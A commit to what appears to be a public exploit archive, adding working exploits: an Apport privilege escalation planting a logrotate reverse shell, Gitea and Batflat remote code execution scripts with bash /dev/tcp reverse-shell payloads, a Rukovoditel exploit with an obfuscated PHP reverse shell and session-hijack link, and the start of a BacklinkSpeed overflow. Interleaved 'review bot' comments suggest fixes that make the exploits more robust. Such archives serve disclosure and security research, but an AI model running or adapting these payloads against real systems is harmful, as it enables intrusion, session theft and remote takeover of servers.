DB: 2021-02-19

7 changes to exploits/shellcodes

BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)

Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path

Apport 2.20 - Local Privilege Escalation

Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)

Rukovoditel 2.6.1 - RCE
Rukovoditel 2.6.1 - RCE (1)

Gitea 1.12.5 - Remote Code Execution (Authenticated)

Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
Offensive Security 2021-02-19 05:01:53 +00:00
parent bbe36569c3
commit cc85c56b4c
8 changed files with 1121 additions and 1 deletions


@ -0,0 +1,316 @@
# Exploit Title: Apport 2.20 - Local Privilege Escalation
# Date: 18/02/21
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://ubuntu.com/
# Version:
Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5
Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16
Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23
Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30
# Tested on: Ubuntu
This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234.
# Setup
To compile the exploit code several packages are needed:
sudo apt-get install build-essential nasm gcc
# Compilation
make
# Run
./exploit.sh
The reverse shell will connect on the next execution of logrotate
nc -l -p 1234
## Makefile ##
.PHONY: all clean
CC=gcc
CFLAGS=
NASM=nasm
NASM_FLAGS=-f elf64
LD=ld
all: exploit crash decoy
exploit: exploit.c
$(CC) -o $@ $< $(CFLAGS)
chmod +x $@
crash: crash.o
$(LD) $^ -o $@
decoy: decoy.o
$(LD) $^ -o $@
crash.o: crash.asm
$(NASM) $(NASM_FLAGS) $^
decoy.o: decoy.asm
$(NASM) $(NASM_FLAGS) $^
clean:
rm exploit decoy crash *.o
## crash.asm ##
section .data
message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00
timeval:
tv_sec dd 0
tv_usec dd 0
section .text
global _start
_start:
mov dword [tv_sec], 4000000
mov dword [tv_usec], 0
mov rax, 35
mov rdi, timeval
mov rsi, 0
syscall
## decoy.asm ##
section .text
global _start
_start:
mov dword [0], 0
## exploit.c ##
#include <unistd.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PID_THRESHOLD (80)
int read_max_pid_file()
{
FILE *fd = 0;
char buf[256];
fd = fopen("/proc/sys/kernel/pid_max", "r");
fread(buf, sizeof(buf), 1, fd);
fclose(fd);
return atoi(buf);
}
void write_to_fifo_file(char * path)
{
FILE *fd = 0;
char buf[] = "A";
fd = fopen(path, "w");
fwrite(buf, sizeof(buf), 1, fd);
fclose(fd);
return;
}
int main(int argc, char *argv[])
{
int iteration = 0;
pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1;
int current_pid = 0, max_pid = 0;
int total_pid = 0;
char *crash_argv[] = {"crash", NULL};
char *sudo_argv[] = {"sudo", "-S", "sud", NULL};
char current_dir[1024] = {0};
char exec_buf[2048] = {0};
char crash_buf[2048] = {0};
struct stat sb = {0} ;
int null_fd = -1;
signal(SIGCHLD, SIG_IGN);
getcwd(current_dir, sizeof(current_dir));
snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0");
snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash");
chdir("/etc/logrotate.d/");
// Creating the crash program
if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR)
{
crash_pid = fork();
if (0 == crash_pid)
{
execve(crash_buf, crash_argv, NULL);
exit(0);
}
else if(-1 == crash_pid)
{
printf("[-] Could not fork program\n");
return -1;
}
}
else
{
printf("[-] Please check crash file executable.");
return -1;
}
max_pid = read_max_pid_file();
printf("[*] crash pid: %d\n", crash_pid);
printf("[*] max pid: %d\n", max_pid);
printf("[*] Creating ~%d PIDs\n", max_pid);
printf("[*] Forking new processes\n");
sleep(3);
// Iterating through max_pid to almost reach the crash program pid
while (iteration < max_pid - 1)
{
// Print progress of forks
if( 0 == (iteration % (int)(max_pid / 5000)))
{
printf("\rIteration: %d/%d", iteration + 1, max_pid);
fflush(stdout);
}
temp_pid = -1;
temp_pid = fork();
if (0 == temp_pid)
{
exit(0);
}
else if (temp_pid > 0)
{
iteration++;
// We should stop before the crash pid to avoid other processes created meanwhile to interfere the exploit process
if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD)
{
printf("\rIteration: %d/%d\n", iteration + 1, max_pid);
fflush(stdout);
printf("[+] less then %d pid from the target: last fork=%d , target: %d\n", PID_THRESHOLD, temp_pid, crash_pid);
break;
}
}
else if (-1 == temp_pid)
{
printf("[-] Could not fork temp programs\n");
}
}
printf("[*] Crashing the crash program\n");
kill(crash_pid, SIGSEGV); // From Now on the seconds apport will launch and we have 30 seconds to exploit it
sleep(5);
printf("[*] Killing the crash program\n");
kill(crash_pid, SIGKILL);
sleep(3);
// Now crash pid is free and we need to occupy it
for(int i=0; i < PID_THRESHOLD ; i++)
{
spray_pid = fork();
if (0 == spray_pid)
{
if (crash_pid == getpid())
{
null_fd = open("/dev/null", O_WRONLY);
dup2(null_fd, 1);
dup2(null_fd, 2);
close(null_fd);
printf("[+] Creating suid process\n");
execve(exec_buf, sudo_argv, NULL);
}
exit(0);
}
}
sleep(3);
printf("[*] Writing to fifo file\n");
write_to_fifo_file(argv[1]);
// Now the first apport released and the second apport resumed
printf("[+] Wrote core file to cwd!\n");
sleep(10); // Waiting for the second apport to finish execution
return 0;
}
## exploit.sh ##
#!/bin/sh
set -e
echo "[*] Running exploit"
touch /var/crash/test.log
ulimit -c unlimited
if [ ! -d "~/.config/apport" ]; then
echo "[*] Settings directory not exists"
echo "[*] Creating settings directory"
mkdir -p ~/.config/apport
fi
if [ ! -f "~/.config/apport/settings" ] ; then
echo "[*] Settings file not exists"
echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings
echo "[+] Settings file created"
fi
DECOY_PATH=`realpath ./decoy`
MY_UID=`id -u`
DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'`
DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}"
if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then
echo "[*] decoy crash exists deleting the file"
rm $DECOY_CRASH_PATH
fi
mkfifo $DECOY_CRASH_PATH
echo "[+] FIFO file created"
./decoy 2>&1 >/dev/null &
killall -SIGSEGV ./decoy
echo "[+] Decoy process created"
SUDO_PATH=`which sudo`
ln -s $SUDO_PATH "linkchange"
python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')"
echo "[+] symlink to sudo created"
./exploit $DECOY_CRASH_PATH
rm $DECOY_CRASH_PATH
sleep 5
if [ -f "/etc/logrotate.d/core" ] ; then
echo "[*] Exploit succesfully finished"
else
echo "[*] Exploit failed"
fi
# Kill the sudo process after second apport finished
kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'`
##
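Review bot: In `exploit.sh` the tests `[ ! -d "~/.config/apport" ]` and `[ ! -f "~/.config/apport/settings" ]` quote the tilde, which suppresses tilde expansion, so both conditions are always true and the script recreates the directory and overwrites any existing `~/.config/apport/settings` on every run, despite the "not exists" messages it prints. Unquoting the tilde (`[ ! -d ~/.config/apport ]`, `[ ! -f ~/.config/apport/settings ]`) or using `"$HOME/.config/apport"` makes the checks effective and preserves a user's existing settings file. Separately, `# Tested on: Ubuntu` does not say which of the four releases listed under `# Version:` the PoC was actually run against; `# Tested on: Ubuntu <release> (Apport <version>)` would let readers tell tested from merely listed versions.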


@ -0,0 +1,245 @@
# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Date: 17 Feb 2020
# Exploit Author: Podalirius
# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# Vendor Homepage: https://gitea.io/
# Software Link: https://dl.gitea.io/
# Version: >= 1.1.0 to <= 1.12.5
# Tested on: Ubuntu 16.04 with GiTea 1.6.1
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import os
import pexpect
import random
import re
import sys
import time
import requests
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
class GiTea(object):
def __init__(self, host, verbose=False):
super(GiTea, self).__init__()
self.verbose = verbose
self.host = host
self.username = None
self.password = None
self.uid = None
self.session = None
def _get_csrf(self, url):
pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"'
csrf = []
while len(csrf) == 0:
r = self.session.get(url)
csrf = re.findall(pattern, r.text)
time.sleep(1)
csrf = csrf[0]
return csrf
def _get_uid(self, url):
pattern = 'name="_uid" content="([0-9]+)"'
uid = re.findall(pattern, self.session.get(url).text)
while len(uid) == 0:
time.sleep(1)
uid = re.findall(pattern, self.session.get(url).text)
uid = uid[0]
return int(uid)
def login(self, username, password):
if self.verbose == True:
print(" [>] login('%s', ...)" % username)
self.session = requests.Session()
r = self.session.get('%s/user/login' % self.host)
self.username = username
self.password = password
# Logging in
csrf = self._get_csrf(self.host)
r = self.session.post(
'%s/user/login?redirect_to=%%2f%s' % (self.host, self.username),
data = {'_csrf':csrf, 'user_name':username, 'password':password},
allow_redirects=True
)
if b'Username or password is incorrect.' in r.content:
return False
else:
# Getting User id
self.uid = self._get_uid(self.host)
return True
def repo_create(self, repository_name):
if self.verbose == True:
print(" [>] Creating repository : %s" % repository_name)
csrf = self._get_csrf(self.host)
# Create repo
r = self.session.post(
'%s/repo/create' % self.host,
data = {
'_csrf' : csrf,
'uid' : self.uid,
'repo_name' : repository_name,
'description' : "Lorem Ipsum",
'gitignores' : '',
'license' : '',
'readme' : 'Default',
'auto_init' : 'off'
}
)
return None
def repo_delete(self, repository_name):
if self.verbose == True:
print(" [>] Deleting repository : %s" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name))
# Delete repository
r = self.session.post(
'%s/%s/%s/settings' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'action' : "delete",
'repo_name' : repository_name
}
)
return
def repo_set_githook_pre_receive(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_pre_receive('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name))
# Set pre receive git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def repo_set_githook_update(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_update('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name))
# Set update git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def repo_set_githook_post_receive(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_post_receive('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name))
# Set post receive git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def logout(self):
if self.verbose == True:
print(" [>] logout()")
# Logging out
r = self.session.get('%s/user/logout' % self.host)
return None
def trigger_exploit(host, username, password, repository_name, verbose=False):
# Create a temporary directory
tmpdir = os.popen('mktemp -d').read().strip()
os.chdir(tmpdir)
# We create some files in the repository
os.system('touch README.md')
rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)])
os.system('echo "%s" >> README.md' % rndstring)
os.system('git init')
os.system('git add README.md')
os.system('git commit -m "Initial commit"')
# Connect to remote source repository
os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name))
# Push the files (it will trigger post-receive git hook)
conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir)
conn.expect("Username for .*: ")
conn.sendline(username)
conn.expect("Password for .*: ")
conn.sendline(password)
conn.expect("Total.*")
print(conn.before.decode('utf-8').strip())
return None
def header():
print(""" _____ _ _______
/ ____(_)__ __| CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
\_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5
""")
if __name__ == '__main__':
header()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.')
parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)')
parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username')
parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password')
parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP')
parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port')
parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.')
args = parser.parse_args()
if (args.rev_ip == None or args.rev_port == None):
if args.payload_file == None:
print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed')
sys.exit(-1)
# Read specific payload file
if args.payload_file != None:
f = open(args.payload_file, 'r')
hook_payload = ''.join(f.readlines())
f.close()
else:
hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port)
if args.target.startswith('http://'):
pass
elif args.target.startswith('https://'):
pass
else:
args.target = 'https://' + args.target
print('[+] Starting exploit ...')
g = GiTea(args.target, verbose=args.verbose)
if g.login(args.username, args.password):
reponame = 'vuln'
g.repo_delete(reponame)
g.repo_create(reponame)
g.repo_set_githook_post_receive(reponame, hook_payload)
g.logout()
trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose)
g.repo_delete(reponame)
else:
print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.')
print('[+] Exploit completed !')
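Review bot: `trigger_exploit` interpolates `host`, `username` and `repository_name` straight into `os.system` shell strings (`'git remote add origin %s/%s/%s.git' % (host, username, repository_name)`), so any shell metacharacter in the `--target` or `--username` arguments is interpreted by `/bin/sh` rather than handed to git; `subprocess.run(['git', 'remote', 'add', 'origin', '%s/%s/%s.git' % (host, username, repository_name)], check=True)` passes the value as one argv entry, and the same applies to the `git init`/`add`/`commit` calls and the `pexpect.spawn` command line. `_get_csrf` also loops with no upper bound while `re.findall` returns nothing, so an unexpected response page hangs the script instead of failing; a small retry limit that raises after a few attempts would surface the error. Lastly, the `#!/usr/bin/env python3` line sits below the header comments, so it is inert; the same holds for `#!/usr/bin/python3` in 49573.py and `#!/usr/bin/python` in 48726.py.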

376
exploits/php/webapps/48784.py Executable file

@ -0,0 +1,376 @@
#!/usr/bin/python3
# Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated)
# Exploit Author: @_danyx07
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: Rukovoditel < 2.7
# Tested on: Debian 9 Rukovoditel 2.6.1
# CVE : CVE-2020-11819
# Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile.
# With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell.
# Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code.
# Protip: remember to check if the registration module is enabled ;)
import sys
import requests
from bs4 import BeautifulSoup
import re
import base64
import argparse
import os
from shutil import copyfile
import datetime
import hashlib
import socket
import threading
import time
import random
import uuid
__version__ = '1.0'
parser = argparse.ArgumentParser(description=
"Post-authenticate RCE for rukovoditel, script version %s" % __version__,
usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
parser.add_argument('-t', '--target', metavar='URL', type=str, required=True,
help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
parser.add_argument('-u', '--user', type=str,
help='Username for authentication')
parser.add_argument('-p', '--password', type=str,
help='Password for authentication')
parser.add_argument('-a', '--type', required=True, type=str,
help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application')
parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str,
help='IP attacker for reverse shell!')
parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str,
help='Port for reverse shell connection')
parser.add_argument('--proxy', metavar="PROXY",
help='Setup http proxy for debbugin http://127.0.0.1:8080')
args = parser.parse_args()
# Global variables
s = requests.Session()
url = args.target
user = args.user
pwd = args.password
typeAttack = args.type
IP=args.ip
PORT=args.port
proxyDict = {"http" : args.proxy, "https" : args.proxy}
csrf_token=""
pht=None
flag_access=False
sid = uuid.uuid4().hex
def serverShell():
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server_address = (IP,int(PORT))
server.bind((server_address))
server.listen(0)
print("[+] Listening on %s:%s" % (IP,PORT))
conn,addr = server.accept()
print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1]))
print("Type 'quit' for exit")
server.settimeout(10)
while True:
cmd = input()
if cmd == 'quit':
print("[-] Closing connection with the shell")
conn.close()
server.close()
break
cmd = cmd + "\n"
if len(str(cmd)) > 0:
command = conn.send(cmd.encode('utf-8'))
try:
response = conn.recv(2048)
print(response.decode('utf-8'))
except server.timeout:
print("Didn't receive data!")
finally:
server.close()
conn.close()
def authByCookie():
global flag_access
global sid
url_hijack = url+'index.php?sid='+sid
url_in = url+"index.php?module=dashboard/"
print("[+] Send this URL to the victim -> %s" % url_hijack)
while True:
if flag_access == True:
break
def checkAccess(stop):
global flag_access
time.sleep(3)
while True:
if typeAttack == 'L':
s.cookies.clear()
s.cookies.set('sid',sid)
url_login = url+'index.php?module=users/account'
r = s.get(url_login, proxies=proxyDict)
response = r.text
if response.find('account_form') != -1:
print("[+] Access granted!")
soup = BeautifulSoup(response, 'lxml')
csrf_token = soup.find('input')['value']
flag_access=True
else:
print("[-] Waiting for access")
if stop():
break
time.sleep(3)
return 0
def makeAuth():
url_login = url+'index.php?module=users/login&action=login'
r = s.get(url_login, proxies=proxyDict)
html = r.text
soup = BeautifulSoup(html, 'lxml')
csrf_token = soup.find('input')['value']
print("[+] Getting CSRF Token %s" % csrf_token )
auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token}
print("[+] Trying to authenticate with username %s" % user)
r = s.post(url_login, data=auth, proxies=proxyDict)
response = r.text
if response.find("login_form") != -1:
print("[-] Authentication failed... No match for Username and/or Password!")
return -1
def createEvilFile():
rv = """
/*<?php /**/
unlink(__FILE__);
@error_reporting(0);
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='"""+IP+"""';
$port="""+PORT+""";
if(!function_exists('SsMEEaClAOR')){
function SsMEEaClAOR($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\\n";
}
$RhoVbBR='is_callable';
$vaVrJ='in_array';
if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){
$o=shell_exec($c);
}else
if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($RhoVbBR('system')and!$vaVrJ('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
{
$o=0;
}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://$ipaddr",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=SsMEEaClAOR(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=SsMEEaClAOR(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
"""
encoded_bytes = rv.encode('ascii')
b64_bytes = base64.b64encode(encoded_bytes);
payload = b64_bytes.decode('ascii')
createImage()
copyfile("./tux.png","/tmp/evil-tux.png")
evilF = open('/tmp/evil-tux.png','a+')
evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>")
evilF.close()
print("[+] Evil file created!")
def searchFile(etime):
cdate = etime
for i in range(3600,52200,900):
h1 = hashlib.sha1()
img1 = str(cdate+i)+"_evil-tux.png"
h1.update(img1.encode('utf-8'))
r = requests.get(url+"uploads/users/"+h1.hexdigest())
if r.status_code == 200:
print(r.text)
return h1.hexdigest()
h2 = hashlib.sha1()
img2 = str(cdate-i)+"_evil-tux.png"
h2.update(img2.encode('utf-8'))
r = requests.get(url+"uploads/users/"+h2.hexdigest())
if r.status_code == 200:
#print(r.text)
return h2.hexdigest()
i+1800
return ""
def uploadFile():
global pht
print("[+] Trying to upload evil file!...")
form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':'english.php'}
files = {'fields[10]':open('/tmp/evil-tux.png','rb')}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
date = r.headers['Date']
etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
#reg = re.findall(r"([a-fA-F\d]{40})",r.text)
reg = None
if not reg:
print("[-] The file name was not found in the response :(")
fileUp = searchFile(etime)
else:
fileUp = reg[0]
print("[+] Looking for the file name uploaded...")
r = s.get(url+"/uploads/users/"+fileUp)
if r.status_code!=200:
print("[-] File name couldn't be found!")
exit()
pht="../../uploads/users/"+fileUp
print("[+] String for path traversal is %s" % pht)
def updateProfile(oplang="english.php"):
if oplang == "english.php":
print("[+] Updating profile with language %s " % oplang)
payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
files = {"":""}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
return 0
else:
print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
files = {"":""}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
serverShell()
def createImage():
if os.path.exists("tux.png"):
return
imgb64 = "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"
f = open("tux.png","wb")
f.write(base64.b64decode(imgb64))
f.close()
def main():
s.cookies.clear()
stop_threads = False
check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, ))
check_thread.start()
if typeAttack == "C":
if makeAuth() == -1:
stop_threads = True
check_thread.join()
print("[-] Exiting...")
exit(0)
elif typeAttack == "L":
authByCookie()
else:
"[!] You must specify the type of attack with the -a option"
exit()
createEvilFile()
uploadFile()
updateProfile(pht)
stop_threads = True
check_thread.join()
print("[+] Starting clean up...")
updateProfile()
os.remove("/tmp/evil-tux.png")
print("[+] Exiting...")
if __name__ == '__main__':
main()
s.cookies.clear()
"""try:
main()
s.cookies.clear()
except Exception as e:
print("[\033[91m!\033[0m] Error: %s" % e)"""
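Review bot: The header is internally inconsistent about the affected version: the title says `Rukovoditel 2.7.1`, `# Version:` says `Rukovoditel < 2.7`, and `# Tested on:` says `2.6.1`, so a reader cannot tell whether 2.7.x is affected; the three lines should be reconciled into one statement of the affected range plus the build actually tested. In `main`, the `else` branch holds the bare string `"[!] You must specify the type of attack with the -a option"` as an expression statement, so the message is never shown before `exit()`; wrap it in `print(...)`. In `searchFile`, `i+1800` at the end of the loop body is a no-op expression (the `range` already steps by 900) and can be deleted.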


@ -5,6 +5,7 @@
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819
set -e

88
exploits/php/webapps/49573.py Executable file

@ -0,0 +1,88 @@
# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734
#!/usr/bin/python3
import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep
print(colored('''###########################################################''',"red"))
print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")
if len(sys.argv) != 6:
print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
print((colored("[~] Default credentials: admin/admin","red")))
print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
"username": username,
"password": password,
"login": "",
}
login = s.post(url+"admin/", login_data, headers=headers)
sleep(0.5)
#Get token
print((colored("[+] Retrieving the token","blue")))
r = s.get(url+"admin/", headers=headers).content
soup = BeautifulSoup(r, "lxml")
token = (re.search(r't=(.*?)">Add', str(soup)).group(1))
print((colored("[+] Token ID: " + token,"blue")))
sleep(0.5)
#Get URL
print((colored("[+] Getting the add-user endpoint URL","blue")))
r = s.get(url+"admin/users/add?t="+token, headers=headers).content
soup = BeautifulSoup(r, "lxml")
add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1))
sleep(0.5)
#Exploit
print((colored("[+] Adding pwnd user","blue")))
payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>"
add_user = {
"username": (None, "pwnd"),
"fullname": (None, payload),
"description": (None, "pwnd"),
"email": (None, "pwnd@evil.com"),
"password": (None, "pwnd123"),
"access[]": (None, "users"),
"save": (None, "Save")
}
exploit = s.post(add_user_url, headers=headers, files=add_user)
sleep(0.5)
#Triggering reverse shell
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin/users/manage?t="+token, headers=headers)
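Review bot: The login response assigned to `login` is never inspected, so wrong credentials are not reported; the script continues and fails later with an `AttributeError` when `re.search(r't=(.*?)">Add', str(soup))` returns `None` and `.group(1)` is called on it. Capture the match first and exit with a clear message: `m = re.search(r't=(.*?)">Add', str(soup))`, `if m is None: sys.exit(colored("[-] Token not found; check URL and credentials", "red"))`, `token = m.group(1)`. The same guard applies to the `action="(.*?)"` search that derives `add_user_url`.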

46
exploits/windows/local/48726.py Executable file

@ -0,0 +1,46 @@
# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
Windows 10.0 x64 Build 10240
Windows 7 x64
Windows Vista x32 SP1
# Replicate Crash:
1) Install and Run the application
2) Run the exploit , the exploit create a text file named payload.txt
3) Press import button and open payload.txt
#!/usr/bin/python
'''
|----------------------------------|
| SEH chain of thread 00000350 |
| Address SE handler |
